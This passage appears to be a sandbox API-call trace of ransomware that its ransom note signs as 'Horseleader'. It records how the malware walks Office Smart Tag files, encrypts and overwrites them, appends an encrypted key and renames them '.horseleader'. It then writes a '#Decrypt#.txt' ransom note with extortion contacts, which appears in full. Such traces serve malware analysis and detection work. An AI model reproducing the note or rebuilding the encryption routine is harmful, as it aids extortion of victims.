ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x8a301d00, ftLastWriteTime.dwHighDateTime=0x1c2d7fa, nFileSizeHigh=0x0, nFileSizeLow=0x734, dwReserved0=0x448348bd, dwReserved1=0x6d5c4c3f, cFileName="PHONE.XML", cAlternateFileName="")) returned 1 [0245.607] lstrcmpiW (lpString1="PHONE.XML", lpString2="Windows") returned -1 [0245.607] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\PHONE.XML") returned 81 [0245.607] StrStrIW (lpFirst="PHONE.XML", lpSrch=".horseleader") returned 0x0 [0245.607] lstrcmpW (lpString1="PHONE.XML", lpString2="#Decrypt#.txt") returned 1 [0245.607] lstrcmpW (lpString1="PHONE.XML", lpString2="_uninstalling_.png") returned 1 [0245.607] lstrlenW (lpString=".testttjffg") returned 11 [0245.607] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\PHONE.XML", lpSrch=".testttjffg") returned 0x0 [0245.607] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32ae820 | out: pbBuffer=0x32ae820) returned 1 [0245.607] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x24, dwBufLen=0x80 | out: pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x80) returned 1 [0245.607] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\PHONE.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\phone.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0245.608] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\PHONE.XML") returned 81 [0245.608] StrStrW (lpFirst="PHONE.XML", lpSrch=".txt") returned 0x0 [0245.608] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x32ae8e0 | out: lpFileSize=0x32ae8e0*=1844) returned 1 [0245.608] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesRead=0x32ae904*=0x734, lpOverlapped=0x0) returned 1 [0245.610] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xfffff8cc, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.610] WriteFile (in: hFile=0x15c, lpBuffer=0x32a9820*, nNumberOfBytesToWrite=0x734, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0x734, lpOverlapped=0x0) returned 1 [0245.611] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.611] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae8d8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae8d8*, lpNumberOfBytesWritten=0x32ae904*=0x4, lpOverlapped=0x0) returned 1 [0245.611] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae820*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae820*, lpNumberOfBytesWritten=0x32ae904*=0x80, lpOverlapped=0x0) returned 1 [0245.611] CloseHandle (hObject=0x15c) returned 1 [0245.611] GetProcessHeap () returned 0x780000 [0245.611] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dbfe8 [0245.611] wnsprintfW (in: pszDest=0x7dbfe8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\PHONE.XML.horseleader") returned 93 [0245.611] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\PHONE.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\phone.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\PHONE.XML.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\phone.xml.horseleader")) returned 1 [0245.614] GetProcessHeap () returned 0x780000 [0245.614] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dbfe8 | out: hHeap=0x780000) returned 1 [0245.614] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc1271800, ftCreationTime.dwHighDateTime=0x1c4481e, ftLastAccessTime.dwLowDateTime=0xef058230, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xc1271800, ftLastWriteTime.dwHighDateTime=0x1c4481e, nFileSizeHigh=0x0, nFileSizeLow=0x9869, dwReserved0=0x448348bd, dwReserved1=0x6d5c4c3f, cFileName="STOCKS.DAT", cAlternateFileName="")) returned 1 [0245.614] lstrcmpiW (lpString1="STOCKS.DAT", lpString2="Windows") returned -1 [0245.614] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.DAT") returned 82 [0245.614] StrStrIW (lpFirst="STOCKS.DAT", lpSrch=".horseleader") returned 0x0 [0245.614] lstrcmpW (lpString1="STOCKS.DAT", lpString2="#Decrypt#.txt") returned 1 [0245.614] lstrcmpW (lpString1="STOCKS.DAT", lpString2="_uninstalling_.png") returned 1 [0245.614] lstrlenW (lpString=".testttjffg") returned 11 [0245.614] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.DAT", lpSrch=".testttjffg") returned 0x0 [0245.614] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32ae820 | out: pbBuffer=0x32ae820) returned 1 [0245.615] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x24, dwBufLen=0x80 | out: pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x80) returned 1 [0245.615] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.DAT" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\stocks.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0245.615] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.DAT") returned 82 [0245.615] StrStrW (lpFirst="STOCKS.DAT", lpSrch=".txt") returned 0x0 [0245.615] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x32ae8e0 | out: lpFileSize=0x32ae8e0*=39017) returned 1 [0245.615] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesRead=0x32ae904*=0x5000, lpOverlapped=0x0) returned 1 [0245.618] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.618] WriteFile (in: hFile=0x15c, lpBuffer=0x32a9820*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0x5000, lpOverlapped=0x0) returned 1 [0245.619] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesRead=0x32ae904*=0x4869, lpOverlapped=0x0) returned 1 [0245.620] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xffffb797, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.620] WriteFile (in: hFile=0x15c, lpBuffer=0x32a9820*, nNumberOfBytesToWrite=0x4869, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0x4869, lpOverlapped=0x0) returned 1 [0245.620] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.620] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae8d8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae8d8*, lpNumberOfBytesWritten=0x32ae904*=0x4, lpOverlapped=0x0) returned 1 [0245.620] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae820*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae820*, lpNumberOfBytesWritten=0x32ae904*=0x80, lpOverlapped=0x0) returned 1 [0245.620] CloseHandle (hObject=0x15c) returned 1 [0245.620] GetProcessHeap () returned 0x780000 [0245.620] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dbfe8 [0245.620] wnsprintfW (in: pszDest=0x7dbfe8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.DAT.horseleader") returned 94 [0245.621] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.DAT" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\stocks.dat"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.DAT.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\stocks.dat.horseleader")) returned 1 [0245.621] GetProcessHeap () returned 0x780000 [0245.621] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dbfe8 | out: hHeap=0x780000) returned 1 [0245.621] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5866b900, ftCreationTime.dwHighDateTime=0x1c29047, ftLastAccessTime.dwLowDateTime=0xef058230, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x5866b900, ftLastWriteTime.dwHighDateTime=0x1c29047, nFileSizeHigh=0x0, nFileSizeLow=0xa7f, dwReserved0=0x448348bd, dwReserved1=0x6d5c4c3f, cFileName="STOCKS.XML", cAlternateFileName="")) returned 1 [0245.621] lstrcmpiW (lpString1="STOCKS.XML", lpString2="Windows") returned -1 [0245.622] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.XML") returned 82 [0245.622] StrStrIW (lpFirst="STOCKS.XML", lpSrch=".horseleader") returned 0x0 [0245.622] lstrcmpW (lpString1="STOCKS.XML", lpString2="#Decrypt#.txt") returned 1 [0245.622] lstrcmpW (lpString1="STOCKS.XML", lpString2="_uninstalling_.png") returned 1 [0245.622] lstrlenW (lpString=".testttjffg") returned 11 [0245.622] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.XML", lpSrch=".testttjffg") returned 0x0 [0245.622] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32ae820 | out: pbBuffer=0x32ae820) returned 1 [0245.622] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x24, dwBufLen=0x80 | out: pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x80) returned 1 [0245.622] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\stocks.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0245.623] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.XML") returned 82 [0245.623] StrStrW (lpFirst="STOCKS.XML", lpSrch=".txt") returned 0x0 [0245.623] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x32ae8e0 | out: lpFileSize=0x32ae8e0*=2687) returned 1 [0245.623] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesRead=0x32ae904*=0xa7f, lpOverlapped=0x0) returned 1 [0245.625] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xfffff581, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.625] WriteFile (in: hFile=0x15c, lpBuffer=0x32a9820*, nNumberOfBytesToWrite=0xa7f, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0xa7f, lpOverlapped=0x0) returned 1 [0245.625] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.625] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae8d8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae8d8*, lpNumberOfBytesWritten=0x32ae904*=0x4, lpOverlapped=0x0) returned 1 [0245.625] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae820*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae820*, lpNumberOfBytesWritten=0x32ae904*=0x80, lpOverlapped=0x0) returned 1 [0245.626] CloseHandle (hObject=0x15c) returned 1 [0245.626] GetProcessHeap () returned 0x780000 [0245.626] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dbfe8 [0245.626] wnsprintfW (in: pszDest=0x7dbfe8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.XML.horseleader") returned 94 [0245.626] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\stocks.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.XML.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\stocks.xml.horseleader")) returned 1 [0245.627] GetProcessHeap () returned 0x780000 [0245.627] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dbfe8 | out: hHeap=0x780000) returned 1 [0245.627] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x36acb00, ftCreationTime.dwHighDateTime=0x1c2dd39, ftLastAccessTime.dwLowDateTime=0xef07e390, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x36acb00, ftLastWriteTime.dwHighDateTime=0x1c2dd39, nFileSizeHigh=0x0, nFileSizeLow=0x2174, dwReserved0=0x448348bd, dwReserved1=0x6d5c4c3f, cFileName="TIME.XML", cAlternateFileName="")) returned 1 [0245.627] lstrcmpiW (lpString1="TIME.XML", lpString2="Windows") returned -1 [0245.627] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\TIME.XML") returned 80 [0245.627] StrStrIW (lpFirst="TIME.XML", lpSrch=".horseleader") returned 0x0 [0245.627] lstrcmpW (lpString1="TIME.XML", lpString2="#Decrypt#.txt") returned 1 [0245.627] lstrcmpW (lpString1="TIME.XML", lpString2="_uninstalling_.png") returned 1 [0245.627] lstrlenW (lpString=".testttjffg") returned 11 [0245.627] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\TIME.XML", lpSrch=".testttjffg") returned 0x0 [0245.627] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32ae820 | out: pbBuffer=0x32ae820) returned 1 [0245.627] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x24, dwBufLen=0x80 | out: pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x80) returned 1 [0245.627] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\TIME.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\time.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0245.628] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\TIME.XML") returned 80 [0245.628] StrStrW (lpFirst="TIME.XML", lpSrch=".txt") returned 0x0 [0245.628] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x32ae8e0 | out: lpFileSize=0x32ae8e0*=8564) returned 1 [0245.628] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesRead=0x32ae904*=0x2174, lpOverlapped=0x0) returned 1 [0245.630] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xffffde8c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.631] WriteFile (in: hFile=0x15c, lpBuffer=0x32a9820*, nNumberOfBytesToWrite=0x2174, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0x2174, lpOverlapped=0x0) returned 1 [0245.631] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.631] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae8d8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae8d8*, lpNumberOfBytesWritten=0x32ae904*=0x4, lpOverlapped=0x0) returned 1 [0245.631] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae820*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae820*, lpNumberOfBytesWritten=0x32ae904*=0x80, lpOverlapped=0x0) returned 1 [0245.631] CloseHandle (hObject=0x15c) returned 1 [0245.631] GetProcessHeap () returned 0x780000 [0245.631] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dbfe8 [0245.631] wnsprintfW (in: pszDest=0x7dbfe8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\TIME.XML.horseleader") returned 92 [0245.632] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\TIME.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\time.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\TIME.XML.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\time.xml.horseleader")) returned 1 [0245.633] GetProcessHeap () returned 0x780000 [0245.633] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dbfe8 | out: hHeap=0x780000) returned 1 [0245.633] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x36acb00, ftCreationTime.dwHighDateTime=0x1c2dd39, ftLastAccessTime.dwLowDateTime=0xef07e390, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x36acb00, ftLastWriteTime.dwHighDateTime=0x1c2dd39, nFileSizeHigh=0x0, nFileSizeLow=0x2174, dwReserved0=0x448348bd, dwReserved1=0x6d5c4c3f, cFileName="TIME.XML", cAlternateFileName="")) returned 0 [0245.633] FindClose (in: hFindFile=0x7c68a0 | out: hFindFile=0x7c68a0) returned 1 [0245.633] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\#Decrypt#.txt") returned 85 [0245.633] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0245.634] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0245.634] WriteFile (in: hFile=0x1a4, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32ae920, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32ae920*=0x5e4, lpOverlapped=0x0) returned 1 [0245.636] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0245.636] WriteFile (in: hFile=0x1a4, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32ae920, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32ae920*=0x558, lpOverlapped=0x0) returned 1 [0245.636] CloseHandle (hObject=0x1a4) returned 1 [0245.636] GetProcessHeap () returned 0x780000 [0245.636] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0245.636] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11f34c00, ftCreationTime.dwHighDateTime=0x1c62260, ftLastAccessTime.dwLowDateTime=0x5f42f7d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x11f34c00, ftLastWriteTime.dwHighDateTime=0x1c62260, nFileSizeHigh=0x0, nFileSizeLow=0x377ef, dwReserved0=0x33bd0262, dwReserved1=0xcc71a064, cFileName="BASMLA.XSL", cAlternateFileName="")) returned 1 [0245.636] lstrcmpiW (lpString1="BASMLA.XSL", lpString2="Windows") returned -1 [0245.636] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\BASMLA.XSL") returned 77 [0245.636] StrStrIW (lpFirst="BASMLA.XSL", lpSrch=".horseleader") returned 0x0 [0245.636] lstrcmpW (lpString1="BASMLA.XSL", lpString2="#Decrypt#.txt") returned 1 [0245.637] lstrcmpW (lpString1="BASMLA.XSL", lpString2="_uninstalling_.png") returned 1 [0245.637] lstrlenW 